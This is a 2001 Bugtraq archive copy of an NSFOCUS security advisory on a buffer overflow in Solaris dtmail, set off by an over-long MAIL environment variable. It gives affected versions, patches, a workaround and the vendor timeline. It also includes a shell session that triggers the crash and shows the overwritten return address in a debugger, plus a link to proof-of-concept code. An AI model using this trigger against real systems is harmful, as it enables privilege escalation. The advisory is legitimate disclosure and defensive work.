Bugtraq mailing list archives

NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability

From: Nsfocus Security Team <security () nsfocus com>
Date: Tue, 24 Jul 2001 19:29:35 +0800


NSFOCUS Security Advisory(SA2001-04)

Topic:  Solaris dtmail Buffer Overflow Vulnerability

Release Date£º 2001-7-24

CVE CAN ID : CAN-2001-0548
BUGTRAQ ID : 3081

Affected system:
================

  Sun Solaris 2.6 (SPARC/x86)
  Sun Solaris 7   (SPARC/x86)

Not affected system:
====================

  Sun Solaris 8

Impact:
=========

NSFOCUS Security Team has found a buffer overflow vulnerability in the dtmail
of Solaris handling MAIL environment variable, exploitation of which could
allow an attacker to run arbitrary code with the privilege of mail group.

Description£º
============

dtmail is a mail user agent (MUA) shipped as a part of Solaris CDE. It is
installed setgid mail by default.

The vulnerability results because dtmail do not provide valid boundary check
to certain environment variables, which allows an attacker to launch a buffer
overflow attack.

In case that the MAIL environment variable is a over-length character string
(for instance, longer than 1500 bytes), a stack buffer overflow would occur.
The attacker could overwrite the returned address and run arbitrary code with
mail group privilege.


Exploit:
==========

[test@ /tmp]> uname -a
SunOS sun27 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-5_10
[test@ /tmp]> showrev -p|grep 107200-12
Patch: 107200-12 Obsoletes:  Requires: 108374-01, 107887-08 Incompatibles:
Packages: SUNWdtdst, SUNWdtma
[test@ /tmp]> ls -l /usr/dt/bin/dtmail
-r-xr-sr-x   1 bin      mail     1553244 Jun 12  2001 /usr/dt/bin/dtmail*
[test@ /tmp]> cp /usr/dt/bin/dtmail .
[test@ /tmp]> export DISPLAY=127.0.0.1:0.0
[test@ /tmp]> MAIL=`perl -e 'print "A"x2000'`; export MAIL
[test@ /tmp]> ulimit -c 200000
[test@ /tmp]> /usr/dt/bin/ttsession -s -c ./dtmail

[A dtmail dialog box would prompt out in your X window, click "Local"]

[test@ /tmp]> ls -l core
-rw-------   1 test users    1991892 Jun 22 11:47 core
[test@ /tmp]> dbx ./dtmail ./core
...
Reading dtmail
core file header read successfully
Reading ld.so.1
Reading libSDtMail.so.2
Reading libnsl.so.1
Reading libsocket.so.1
....
Reading libXext.so.0
Reading libc_psr.so.1
detected a multithreaded program
t@1 (l@1) terminated by signal BUS (invalid address alignment)
dbx: core file read error: address 0x41414161 not in data space
dbx: attempt to read stack failed - bad frame pointer
0x001013e4: solaris_valid+0x002c:       ret
(/opt/SUNWspro/bin/../WS5.0/bin/sparcv9/dbx)

There is  a proof of concept code for this issue:
http://www.nsfocus.com/proof/sol_sparc_dtmail_MAIL_ex.c


Workaround:
===================

Drop the sgid mail attribute of dtmail:
# chmod g-s /usr/dt/bin/dtmail


Vendor Status:
==============

2001.6.18  We have informed Sun of this issue.
2001.6.21  Sun replied that the overflow would occur even in case that the MAIL
           environment variable has only 1 byte.
2001.6.22  We have reported our testing result, but do not receive any reply up
           to now.

Solaris 2.6 with the following patches is not affected:
SunOS 5.6 SPARC :  105338-27
SunOS 5.6 x86   :  105339-25

Solaris 7 with the following latest patches is still affected:
SunOS 5.7 SPARC :  107200-12
SunOS 5.7 x86   :  107201-12

Solaris 8 is not affected.

Security patches of Sun Inc. are available at:

http://sunsolve.sun.com/securitypatch

Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0548 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems.  Candidates
may change significantly before they become official CVE entries.

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security () nsfocus com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

Attachment: sol_sparc_dtmail_MAIL_ex.c
Description:

Current thread:

NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability Nsfocus Security Team (Jul 24)
- <Possible follow-ups>
- Re: NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability Virtualcat Blackcat (Jul 25)